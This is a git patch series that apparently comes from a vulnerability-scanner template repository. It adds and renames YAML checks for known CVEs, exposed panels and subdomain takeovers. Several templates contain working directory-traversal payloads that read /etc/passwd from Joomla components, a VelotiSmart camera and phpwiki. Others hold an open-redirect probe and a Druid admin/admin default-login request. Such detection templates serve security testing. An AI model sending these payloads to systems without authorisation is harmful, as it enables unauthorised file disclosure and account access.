exposed-panels/{watchguard.yaml => watchguard-panel.yaml} (81%) diff --git a/exposed-panels/watchguard.yaml b/exposed-panels/watchguard-panel.yaml similarity index 81% rename from exposed-panels/watchguard.yaml rename to exposed-panels/watchguard-panel.yaml index e1af7a14ae..6029717174 100644 --- a/exposed-panels/watchguard.yaml +++ b/exposed-panels/watchguard-panel.yaml @@ -1,7 +1,7 @@ -id: watchguard +id: watchguard-panel info: - name: Watchguard + name: Watchguard Panel author: ahmetpergamum severity: info reference: https://www.exploit-db.com/ghdb/7008 @@ -16,7 +16,7 @@ requests: matchers: - type: word words: - - 'User Authentication' + - 'User Authentication' - 'WatchGuard Technologies' condition: or From 56b02ed87b6943fbcc758bf59f260d240d47d70f Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Tue, 7 Sep 2021 07:35:15 +0700 Subject: [PATCH 086/339] Create CVE-2010-1534.yaml --- cves/2010/CVE-2010-1534.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2010/CVE-2010-1534.yaml diff --git a/cves/2010/CVE-2010-1534.yaml b/cves/2010/CVE-2010-1534.yaml new file mode 100644 index 0000000000..871c657677 --- /dev/null +++ b/cves/2010/CVE-2010-1534.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-1534 + +info: + name: Joomla! Component Shoutbox Pro - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the Shoutbox Pro (com_shoutbox) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/12067 + - https://www.cvedetails.com/cve/CVE-2010-1534 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_shoutbox&controller=../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 From 541d48c25e57885eafb5ba7fc6e5c7b871a7722a Mon Sep 17 00:00:00 2001 From: Roberto Nunes <46332131+Akokonunes@users.noreply.github.com> Date: Tue, 7 Sep 2021 18:52:09 +0900 Subject: [PATCH 087/339] =?UTF-8?q?Create=20CVE-2018=E2=80=9314064.yaml?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- CVE-2018–14064.yaml | 26 ++++++++++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 CVE-2018–14064.yaml diff --git a/CVE-2018–14064.yaml b/CVE-2018–14064.yaml new file mode 100644 index 0000000000..68796ed2a0 --- /dev/null +++ b/CVE-2018–14064.yaml @@ -0,0 +1,26 @@ +id: cve-2018-14064 + +info: + name: VelotiSmart Wifi - Directory Traversal + author: 0x_Akoko + severity: high + reference: | + - https://medium.com/@s1kr10s/velotismart-0day-ca5056bcdcac + - https://www.exploit-db.com/exploits/45030 + tags: velotismart,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/../../etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 From 4da291ef6d71c2ba05d7136f3c0a63bb7726d7c3 Mon Sep 17 00:00:00 2001 From: Roberto Nunes <46332131+Akokonunes@users.noreply.github.com> Date: Tue, 7 Sep 2021 18:54:45 +0900 Subject: [PATCH 088/339] Create phpwiki-lfi.yaml --- phpwiki-lfi.yaml | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 phpwiki-lfi.yaml diff --git a/phpwiki-lfi.yaml b/phpwiki-lfi.yaml new file mode 100644 index 0000000000..d48b733698 --- /dev/null +++ b/phpwiki-lfi.yaml @@ -0,0 +1,24 @@ +id: phpwiki-lfi + +info: + name: phpwiki 1.5.4 - XSS / Local File Inclusion + author: 0x_Akoko + severity: high + reference: https://www.exploit-db.com/exploits/38027 + tags: phpwiki,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/phpwiki/index.php/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 From 4aa8c2f4eef6223ceed843ad0ba615523acc52c1 Mon Sep 17 00:00:00 2001 From: Roberto Nunes <46332131+Akokonunes@users.noreply.github.com> Date: Tue, 7 Sep 2021 18:57:06 +0900 Subject: [PATCH 089/339] Create homeautomation-v3-openredirect.yaml --- homeautomation-v3-openredirect.yaml | 19 +++++++++++++++++++ 1 file changed, 19 insertions(+) create mode 100644 homeautomation-v3-openredirect.yaml diff --git a/homeautomation-v3-openredirect.yaml b/homeautomation-v3-openredirect.yaml new file mode 100644 index 0000000000..f0a3bda1d4 --- /dev/null +++ b/homeautomation-v3-openredirect.yaml @@ -0,0 +1,19 @@ +id: homeautomation-v3-openredirect + +info: + name: HomeAutomation v3.3.2 Open Redirect + author: 0x_Akoko + reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5559.php + severity: medium + tags: homeautomation,redirect + +requests: + - method: GET + path: + - "{{BaseURL}}/homeautomation_v3_3_2/api.php?do=groups/toggle&groupid=1&status=1&redirect=https://example.com/" + + matchers: + - type: regex + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' + part: header From 7a518df21be12293dc47f6a628561933d9e091f4 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Tue, 7 Sep 2021 18:13:12 +0700 Subject: [PATCH 090/339] Create CVE-2010-1607.yaml --- cves/2010/CVE-2010-1607.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2010/CVE-2010-1607.yaml diff --git a/cves/2010/CVE-2010-1607.yaml b/cves/2010/CVE-2010-1607.yaml new file mode 100644 index 0000000000..81f69a9578 --- /dev/null +++ b/cves/2010/CVE-2010-1607.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-1607 + +info: + name: Joomla! Component WMI 1.5.0 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in wmi.php in the Webmoney Web Merchant Interface (aka WMI or com_wmi) component 1.5.0 for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/12316 + - https://www.cvedetails.com/cve/CVE-2010-1607 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_wmi&controller=../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 From f5358eaf1928c5d12c901075ad6745a69e97f330 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 7 Sep 2021 17:57:11 +0530 Subject: [PATCH 091/339] Update homeautomation-v3-openredirect.yaml --- homeautomation-v3-openredirect.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/homeautomation-v3-openredirect.yaml b/homeautomation-v3-openredirect.yaml index f0a3bda1d4..a34fdd4b47 100644 --- a/homeautomation-v3-openredirect.yaml +++ b/homeautomation-v3-openredirect.yaml @@ -5,7 +5,7 @@ info: author: 0x_Akoko reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5559.php severity: medium - tags: homeautomation,redirect + tags: iot,redirect requests: - method: GET From 72e74197323dbafd7d98c9e3bd9866ae1ccd8f18 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 7 Sep 2021 17:58:44 +0530 Subject: [PATCH 092/339] Update homeautomation-v3-openredirect.yaml --- homeautomation-v3-openredirect.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/homeautomation-v3-openredirect.yaml b/homeautomation-v3-openredirect.yaml index a34fdd4b47..9388597d8d 100644 --- a/homeautomation-v3-openredirect.yaml +++ b/homeautomation-v3-openredirect.yaml @@ -3,8 +3,8 @@ id: homeautomation-v3-openredirect info: name: HomeAutomation v3.3.2 Open Redirect author: 0x_Akoko - reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5559.php severity: medium + reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5559.php tags: iot,redirect requests: From 9b754866163fd26a4dead3635c9d57fb7bfe0411 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 7 Sep 2021 18:07:48 +0530 Subject: [PATCH 093/339] Rename homeautomation-v3-openredirect.yaml to vulnerabilities/other/homeautomation-v3-openredirect.yaml --- .../other/homeautomation-v3-openredirect.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename homeautomation-v3-openredirect.yaml => vulnerabilities/other/homeautomation-v3-openredirect.yaml (100%) diff --git a/homeautomation-v3-openredirect.yaml b/vulnerabilities/other/homeautomation-v3-openredirect.yaml similarity index 100% rename from homeautomation-v3-openredirect.yaml rename to vulnerabilities/other/homeautomation-v3-openredirect.yaml From ef6350bfcc2767f967fe16efd8fa80de21798af6 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Tue, 7 Sep 2021 18:14:38 +0530 Subject: [PATCH 094/339] =?UTF-8?q?Update=20and=20rename=20CVE-2018?= =?UTF-8?q?=E2=80=9314064.yaml=20to=20cves/2018/CVE-2018=E2=80=9314064.yam?= =?UTF-8?q?l?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- CVE-2018–14064.yaml | 26 -------------------------- cves/2018/CVE-2018–14064.yaml | 28 ++++++++++++++++++++++++++++ 2 files changed, 28 insertions(+), 26 deletions(-) delete mode 100644 CVE-2018–14064.yaml create mode 100644 cves/2018/CVE-2018–14064.yaml diff --git a/CVE-2018–14064.yaml b/CVE-2018–14064.yaml deleted file mode 100644 index 68796ed2a0..0000000000 --- a/CVE-2018–14064.yaml +++ /dev/null @@ -1,26 +0,0 @@ -id: cve-2018-14064 - -info: - name: VelotiSmart Wifi - Directory Traversal - author: 0x_Akoko - severity: high - reference: | - - https://medium.com/@s1kr10s/velotismart-0day-ca5056bcdcac - - https://www.exploit-db.com/exploits/45030 - tags: velotismart,lfi - -requests: - - method: GET - path: - - "{{BaseURL}}/../../etc/passwd" - - matchers-condition: and - matchers: - - - type: regex - regex: - - "root:[x*]:0:0" - - - type: status - status: - - 200 diff --git a/cves/2018/CVE-2018–14064.yaml b/cves/2018/CVE-2018–14064.yaml new file mode 100644 index 0000000000..ddac97cab7 --- /dev/null +++ b/cves/2018/CVE-2018–14064.yaml @@ -0,0 +1,28 @@ +id: CVE-2018-14064 + +info: + name: VelotiSmart Wifi - Directory Traversal + author: 0x_Akoko + severity: high + description: The uc-http service 1.0.0 on VelotiSmart WiFi B-380 camera devices allows Directory Traversal, as demonstrated by /../../etc/passwd on TCP port 80. + reference: + - https://medium.com/@s1kr10s/velotismart-0day-ca5056bcdcac + - https://www.exploit-db.com/exploits/45030 + - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-14064 + tags: cve,cve2018,lfi,camera,iot + +requests: + - method: GET + path: + - "{{BaseURL}}/../../etc/passwd" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:[x*]:0:0" + + - type: status + status: + - 200 From ded0c4de57a667fb0d67f2bc7c21cb8bf5f68999 Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 7 Sep 2021 21:31:35 +0530 Subject: [PATCH 095/339] Removing takeover templates with no actual impact --- takeovers/acquia-takeover.yaml | 21 --------------------- takeovers/ceros-takeover.yaml | 23 ----------------------- takeovers/fastly-takeover.yaml | 18 ------------------ takeovers/freshservice-takeover.yaml | 21 --------------------- takeovers/landingi-takeover.yaml | 20 -------------------- takeovers/medium-takeover.yaml | 20 -------------------- takeovers/smartling-takeover.yaml | 17 ----------------- takeovers/vercel-takeover.yaml | 20 -------------------- 8 files changed, 160 deletions(-) delete mode 100644 takeovers/acquia-takeover.yaml delete mode 100644 takeovers/ceros-takeover.yaml delete mode 100644 takeovers/fastly-takeover.yaml delete mode 100644 takeovers/freshservice-takeover.yaml delete mode 100644 takeovers/landingi-takeover.yaml delete mode 100644 takeovers/medium-takeover.yaml delete mode 100644 takeovers/smartling-takeover.yaml delete mode 100644 takeovers/vercel-takeover.yaml diff --git a/takeovers/acquia-takeover.yaml b/takeovers/acquia-takeover.yaml deleted file mode 100644 index 3740c22e91..0000000000 --- a/takeovers/acquia-takeover.yaml +++ /dev/null @@ -1,21 +0,0 @@ -id: acquia-takeover - -info: - name: Acquia Takeover Detection - author: pdteam - severity: info - tags: takeover - reference: https://github.com/EdOverflow/can-i-take-over-xyz - -requests: - - method: GET - path: - - "{{BaseURL}}" - - matchers: - - type: word - name: acquia - words: - - If you are an Acquia Cloud customer and expect to see your site at this address - - The site you are looking for could not be found. - condition: and \ No newline at end of file diff --git a/takeovers/ceros-takeover.yaml b/takeovers/ceros-takeover.yaml deleted file mode 100644 index f39d129637..0000000000 --- a/takeovers/ceros-takeover.yaml +++ /dev/null @@ -1,23 +0,0 @@ -id: ceros-takeover - -info: - name: ceros takeover detection - author: abison_binoy - severity: info - tags: takeover - reference: - - https://twitter.com/abison_binoy/status/1412606224030339072 - - https://www.ceros.com/educate/help_center/using-your-own-vanity-domain/ - -requests: - - method: GET - path: - - "{{BaseURL}}" - - matchers: - - type: word - words: - - "Sorry, page not found" - - "Please check the url and" - - "/view.ceros.com/" - condition: and diff --git a/takeovers/fastly-takeover.yaml b/takeovers/fastly-takeover.yaml deleted file mode 100644 index 4b606dfab2..0000000000 --- a/takeovers/fastly-takeover.yaml +++ /dev/null @@ -1,18 +0,0 @@ -id: fastly-takeover - -info: - name: fastly takeover detection - author: pdteam - severity: info - tags: takeover - reference: https://github.com/EdOverflow/can-i-take-over-xyz/issues/22 - -requests: - - method: GET - path: - - "{{BaseURL}}" - - matchers: - - type: word - words: - - "Fastly error: unknown domain:" \ No newline at end of file diff --git a/takeovers/freshservice-takeover.yaml b/takeovers/freshservice-takeover.yaml deleted file mode 100644 index f8365be078..0000000000 --- a/takeovers/freshservice-takeover.yaml +++ /dev/null @@ -1,21 +0,0 @@ -id: freshservice-takeover - -info: - name: freshservice takeover detection - author: philippedelteil - severity: info - tags: takeover - reference: https://twitter.com/secuaudit/status/1142514805590433793 - -requests: - - method: GET - path: - - "{{BaseURL}}" - - matchers: - - type: word - words: - - 'There is no helpdesk here!' - - 'Maybe this is still fresh!' - - 'freshservice.com' - condition: and \ No newline at end of file diff --git a/takeovers/landingi-takeover.yaml b/takeovers/landingi-takeover.yaml deleted file mode 100644 index 2514cf4e17..0000000000 --- a/takeovers/landingi-takeover.yaml +++ /dev/null @@ -1,20 +0,0 @@ -id: landingi-takeover - -info: - name: landingi takeover detection - author: pdteam - severity: info - tags: takeover - reference: https://github.com/EdOverflow/can-i-take-over-xyz/issues/117 - -requests: - - method: GET - path: - - "{{BaseURL}}" - - matchers: - - type: word - words: - - It looks like you're lost - - The page you are looking for is not found - condition: and \ No newline at end of file diff --git a/takeovers/medium-takeover.yaml b/takeovers/medium-takeover.yaml deleted file mode 100644 index 4303e7125a..0000000000 --- a/takeovers/medium-takeover.yaml +++ /dev/null @@ -1,20 +0,0 @@ -id: medium-takeover - -info: - name: Medium Takeover Detection - author: rtcms - severity: info - tags: takeover - reference: https://github.com/EdOverflow/can-i-take-over-xyz/issues/206 - -requests: - - method: GET - path: - - "{{BaseURL}}" - - matchers: - - type: word - words: - - Oops! We couldn’t find that page - - Sorry about that - condition: and diff --git a/takeovers/smartling-takeover.yaml b/takeovers/smartling-takeover.yaml deleted file mode 100644 index 35aebde041..0000000000 --- a/takeovers/smartling-takeover.yaml +++ /dev/null @@ -1,17 +0,0 @@ -id: smartling-takeover - -info: - name: smartling takeover detection - author: pdteam - severity: info - tags: takeover - reference: https://github.com/EdOverflow/can-i-take-over-xyz/issues/67 - -requests: - - method: GET - path: - - "{{BaseURL}}" - matchers: - - type: word - words: - - Domain is not configured diff --git a/takeovers/vercel-takeover.yaml b/takeovers/vercel-takeover.yaml deleted file mode 100644 index cf7dabfebd..0000000000 --- a/takeovers/vercel-takeover.yaml +++ /dev/null @@ -1,20 +0,0 @@ -id: vercel-takeover - -info: - name: vercel takeover detection - author: pdteam - severity: info - tags: takeover - reference: https://github.com/EdOverflow/can-i-take-over-xyz/issues/183 - -requests: - - method: GET - path: - - "{{BaseURL}}" - - matchers: - - type: word - words: - - The deployment could not be found on Vercel. - - DEPLOYMENT_NOT_FOUND - condition: and \ No newline at end of file From 2500db0987a7fd2906c84e1fe208a5f9225f9db5 Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 7 Sep 2021 21:31:50 +0530 Subject: [PATCH 096/339] misc update --- takeovers/uptimerobot-takeover.yaml | 13 ++++++++++--- 1 file changed, 10 insertions(+), 3 deletions(-) diff --git a/takeovers/uptimerobot-takeover.yaml b/takeovers/uptimerobot-takeover.yaml index 3f13c6bead..07476af51e 100644 --- a/takeovers/uptimerobot-takeover.yaml +++ b/takeovers/uptimerobot-takeover.yaml @@ -3,16 +3,23 @@ id: uptimerobot-takeover info: name: uptimerobot takeover detection author: pdteam - severity: info + severity: low tags: takeover - reference: https://github.com/EdOverflow/can-i-take-over-xyz + reference: + - https://exploit.linuxsec.org/uptimerobot-com-custom-domain-subdomain-takeover/ + - https://github.com/EdOverflow/can-i-take-over-xyz/issues/45 requests: - method: GET path: - "{{BaseURL}}" + matchers-condition: and matchers: - type: regex regex: - - "^page not found$" \ No newline at end of file + - "^page not found$" + + - type: status + status: + - 404 \ No newline at end of file From d8b8884c607545fd7170d5284869419633a50211 Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 7 Sep 2021 21:38:06 +0530 Subject: [PATCH 097/339] misc update --- default-logins/druid/druid-default-password.yaml | 10 +++++----- technologies/druid-detect.yaml | 1 + 2 files changed, 6 insertions(+), 5 deletions(-) diff --git a/default-logins/druid/druid-default-password.yaml b/default-logins/druid/druid-default-password.yaml index 0696eafd4a..b4a1e28124 100644 --- a/default-logins/druid/druid-default-password.yaml +++ b/default-logins/druid/druid-default-password.yaml @@ -11,16 +11,16 @@ requests: path: - "{{BaseURL}}/druid/submitLogin" - "{{BaseURL}}/submitLogin" + body: "loginUsername=admin&loginPassword=admin" matchers-condition: and matchers: - - type: word - words: - - 'success' - part: body - condition: and - type: status status: - 200 + + - type: regex + regex: + - "^success$" \ No newline at end of file diff --git a/technologies/druid-detect.yaml b/technologies/druid-detect.yaml index 8cdd990c9e..63b0d5823e 100644 --- a/technologies/druid-detect.yaml +++ b/technologies/druid-detect.yaml @@ -18,6 +18,7 @@ requests: part: body words: - "druid monitor" + - type: status status: - 200 From a06ba7ff1a52f1420caa57e61097326fc741edce Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Wed, 8 Sep 2021 06:44:48 +0700 Subject: [PATCH 098/339] Create CVE-2010-1956.yaml --- cves/2010/CVE-2010-1956.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2010/CVE-2010-1956.yaml diff --git a/cves/2010/CVE-2010-1956.yaml b/cves/2010/CVE-2010-1956.yaml new file mode 100644 index 0000000000..a9e931f712 --- /dev/null +++ b/cves/2010/CVE-2010-1956.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-1956 + +info: + name: Joomla! Component Gadget Factory 1.0.0 - Local File Inclusion + author: daffainfo + severity: high + description: Directory traversal vulnerability in the Gadget Factory (com_gadgetfactory) component 1.0.0 and 1.5.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/12285 + - https://www.cvedetails.com/cve/CVE-2010-1956 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_gadgetfactory&controller=../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 From d7bccc747e36af824a1331a7c77505045990de69 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Wed, 8 Sep 2021 07:00:32 +0700 Subject: [PATCH 099/339] Create CVE-2010-2034.yaml --- cves/2010/CVE-2010-2034.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2010/CVE-2010-2034.yaml diff --git a/cves/2010/CVE-2010-2034.yaml b/cves/2010/CVE-2010-2034.yaml new file mode 100644 index 0000000000..4600c605a4 --- /dev/null +++ b/cves/2010/CVE-2010-2034.yaml @@ -0,0 +1,27 @@ +id: CVE-2010-2034 + +info: + name: Joomla! Component Percha Image Attach 1.1 - Directory Traversal + author: daffainfo + severity: high + description: Directory traversal vulnerability in the Percha Image Attach (com_perchaimageattach) component 1.1 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php. + reference: + - https://www.exploit-db.com/exploits/34003 + - https://www.cvedetails.com/cve/CVE-2010-2034 + tags: cve,cve2010,joomla,lfi + +requests: + - method: GET + path: + - "{{BaseURL}}/index.php?option=com_perchaimageattach&controller=../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 From 31ad69e0cac2e5ab5acde66e1ca7c8c99d354535 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Wed, 8 Sep 2021 08:10:38 +0700 Subject: [PATCH 100/339] Create eg-manager-detect.yaml --- technologies/eg-manager-detect.yaml | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 technologies/eg-manager-detect.yaml diff --git a/technologies/eg-manager-detect.yaml b/technologies/eg-manager-detect.yaml new file mode 100644 index 0000000000..a4b158433e --- /dev/null +++ b/technologies/eg-manager-detect.yaml @@ -0,0 +1,25 @@ +id: eg-manager-detect + +info: + name: eG Manager Detect + author: pikpikcu + severity: info + tags: tech,eg + +requests: + - method: GET + path: + - "{{BaseURL}}/final/" + + matchers-condition: and + matchers: + + - type: word + part: body + words: + - " eG Innovations, Inc." + - "eG Innovations, Inc. All Rights Reserved" + + - type: status + status: + - 200 From 2f110a8a557c8e1e0b0b28695b2732cbbc04bf88 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Wed, 8 Sep 2021 11:28:35 +0700 Subject: [PATCH 101/339] Create daybyday-detect.yaml --- technologies/daybyday-detect.yaml | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 technologies/daybyday-detect.yaml diff --git a/technologies/daybyday-detect.yaml b/technologies/daybyday-detect.yaml new file mode 100644 index 0000000000..15aa07c91a --- /dev/null +++ b/technologies/daybyday-detect.yaml @@ -0,0 +1,24 @@ +id: daybyday-detect + +info: + name: DaybydayCRM Detect + author: pikpikcu + severity: info + tags: tech,daybyday + +requests: + - method: GET + path: + - "{{BaseURL}}/login" + + matchers-condition: and + matchers: + + - type: word + part: body + words: + - "Daybyday - Login" + + - type: status + status: + - 200 From 7e601216b9905396d70d26fa8edef891fa4781aa Mon Sep 17 00:00:00 2001 From: sandeep Date: Wed, 8 Sep 2021 12:58:02 +0530 Subject: [PATCH 102/339] Added additional path --- misconfiguration/aem/aem-groovyconsole.yaml | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) diff --git a/misconfiguration/aem/aem-groovyconsole.yaml b/misconfiguration/aem/aem-groovyconsole.yaml index b56d705f16..a2a388a6ec 100644 --- a/misconfiguration/aem/aem-groovyconsole.yaml +++ b/misconfiguration/aem/aem-groovyconsole.yaml @@ -5,17 +5,21 @@ info: author: Dheerajmadhukar severity: critical description: Groovy console is exposed, RCE is possible. - reference: https://hackerone.com/reports/672243 + reference: + - https://hackerone.com/reports/672243 + - https://twitter.com/XHackerx007/status/1435139576314671105 tags: aem requests: - method: GET path: - "{{BaseURL}}/groovyconsole" + - "{{BaseURL}}/etc/groovyconsole.html" headers: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Language: en-US,en;q=0.9,hi;q=0.8 + stop-at-first-match: true matchers-condition: and matchers: - type: word @@ -25,6 +29,7 @@ requests: - "Groovy Web Console" part: body condition: and + - type: status status: - 200 \ No newline at end of file From 0880b652841ddb4d6087048bdbb29386681b018c Mon Sep 17 00:00:00 2001 From: Sandeep Singh Date: Wed, 8 Sep 2021 13:11:41 +0530 Subject: [PATCH 103/339] =?UTF-8?q?Rename=20CVE-2018=E2=80=9314064.yaml=20?= =?UTF-8?q?to=20CVE-2018-14064.yaml?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cves/2018/{CVE-2018–14064.yaml => CVE-2018-14064.yaml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename cves/2018/{CVE-2018–14064.yaml => CVE-2018-14064.yaml} (100%) diff --git a/cves/2018/CVE-2018–14064.yaml b/cves/2018/CVE-2018-14064.yaml similarity index 100% rename from cves/2018/CVE-2018–14064.yaml rename to cves/2018/CVE-2018-14064.yaml From 609705f67645e2bff36ea0dd1f075151cc5771f5 Mon Sep 17 00:00:00 2001 From: sandeep Date: Wed, 8 Sep 2021 17:47:19 +0530 Subject: [PATCH 104/339] removed extra headers not required for template --- cnvd/CNVD-2020-68596.yaml | 9 +--- cnvd/CNVD-2021-15822.yaml | 1 - cnvd/CNVD-2021-30167.yaml | 2 - cves/2009/CVE-2009-1151.yaml | 4 -- cves/2012/CVE-2012-1823.yaml | 2 - cves/2014/CVE-2014-3120.yaml | 3 -- cves/2015/CVE-2015-1427.yaml | 7 ---- cves/2016/CVE-2016-10033.yaml | 6 --- cves/2016/CVE-2016-3081.yaml | 1 - cves/2017/CVE-2017-1000486.yaml | 3 -- cves/2017/CVE-2017-10271.yaml | 3 -- cves/2017/CVE-2017-12635.yaml | 4 -- cves/2017/CVE-2017-14537.yaml | 9 +--- cves/2017/CVE-2017-15715.yaml | 6 --- cves/2017/CVE-2017-17562.yaml | 4 +- cves/2017/CVE-2017-3506.yaml | 2 - cves/2017/CVE-2017-5638.yaml | 4 -- cves/2017/CVE-2017-9506.yaml | 4 -- cves/2017/CVE-2017-9822.yaml | 4 -- cves/2017/CVE-2017-9841.yaml | 36 ---------------- cves/2018/CVE-2018-1000130.yaml | 17 +++----- cves/2018/CVE-2018-1000533.yaml | 2 - cves/2018/CVE-2018-10141.yaml | 2 - cves/2018/CVE-2018-10818.yaml | 4 -- cves/2018/CVE-2018-16167.yaml | 4 -- cves/2018/CVE-2018-16763.yaml | 1 - cves/2018/CVE-2018-17254.yaml | 1 - cves/2018/CVE-2018-18778.yaml | 2 +- cves/2018/CVE-2018-3760.yaml | 3 -- cves/2018/CVE-2018-7600.yaml | 3 -- cves/2018/CVE-2018-8715.yaml | 5 --- cves/2019/CVE-2019-1010287.yaml | 8 +--- cves/2019/CVE-2019-11869.yaml | 3 -- cves/2019/CVE-2019-13101.yaml | 2 - cves/2019/CVE-2019-15107.yaml | 7 +--- cves/2019/CVE-2019-16278.yaml | 3 -- cves/2019/CVE-2019-16920.yaml | 23 +++------- cves/2019/CVE-2019-17382.yaml | 1 - cves/2019/CVE-2019-17558.yaml | 3 -- cves/2019/CVE-2019-2616.yaml | 1 - cves/2019/CVE-2019-3396.yaml | 6 +-- cves/2019/CVE-2019-6715.yaml | 4 -- cves/2019/CVE-2019-7256.yaml | 16 ++----- cves/2019/CVE-2019-7609.yaml | 16 +++---- cves/2019/CVE-2019-9670.yaml | 1 - cves/2019/CVE-2019-9733.yaml | 10 ++--- cves/2020/CVE-2020-11978.yaml | 9 ---- cves/2020/CVE-2020-12720.yaml | 3 -- cves/2020/CVE-2020-13167.yaml | 19 ++------- cves/2020/CVE-2020-15568.yaml | 2 - cves/2020/CVE-2020-16139.yaml | 1 - cves/2020/CVE-2020-17505.yaml | 5 +-- cves/2020/CVE-2020-17518.yaml | 2 - cves/2020/CVE-2020-24186.yaml | 11 ----- cves/2020/CVE-2020-24579.yaml | 15 +------ cves/2020/CVE-2020-25213.yaml | 2 - cves/2020/CVE-2020-25506.yaml | 4 -- cves/2020/CVE-2020-26919.yaml | 2 - cves/2020/CVE-2020-28188.yaml | 9 +--- cves/2020/CVE-2020-28208.yaml | 3 -- cves/2020/CVE-2020-35713.yaml | 7 +--- cves/2020/CVE-2020-3580.yaml | 1 - cves/2020/CVE-2020-35951.yaml | 21 +--------- cves/2020/CVE-2020-36112.yaml | 8 ---- cves/2020/CVE-2020-5307.yaml | 2 - cves/2020/CVE-2020-5902.yaml | 14 +++---- cves/2020/CVE-2020-7796.yaml | 3 -- cves/2020/CVE-2020-7961.yaml | 9 +--- cves/2020/CVE-2020-8191.yaml | 9 +--- cves/2020/CVE-2020-8193.yaml | 24 +---------- cves/2020/CVE-2020-8194.yaml | 14 ++----- cves/2020/CVE-2020-8515.yaml | 3 -- cves/2020/CVE-2020-8813.yaml | 4 -- cves/2020/CVE-2020-9315.yaml | 2 - cves/2021/CVE-2021-1497.yaml | 2 - cves/2021/CVE-2021-20092.yaml | 4 -- cves/2021/CVE-2021-21307.yaml | 15 +------ cves/2021/CVE-2021-21389.yaml | 1 - cves/2021/CVE-2021-21975.yaml | 1 - cves/2021/CVE-2021-21985.yaml | 2 - cves/2021/CVE-2021-22214.yaml | 2 - cves/2021/CVE-2021-24285.yaml | 1 - cves/2021/CVE-2021-25281.yaml | 6 --- cves/2021/CVE-2021-25646.yaml | 3 -- cves/2021/CVE-2021-26295.yaml | 42 +++++++++---------- 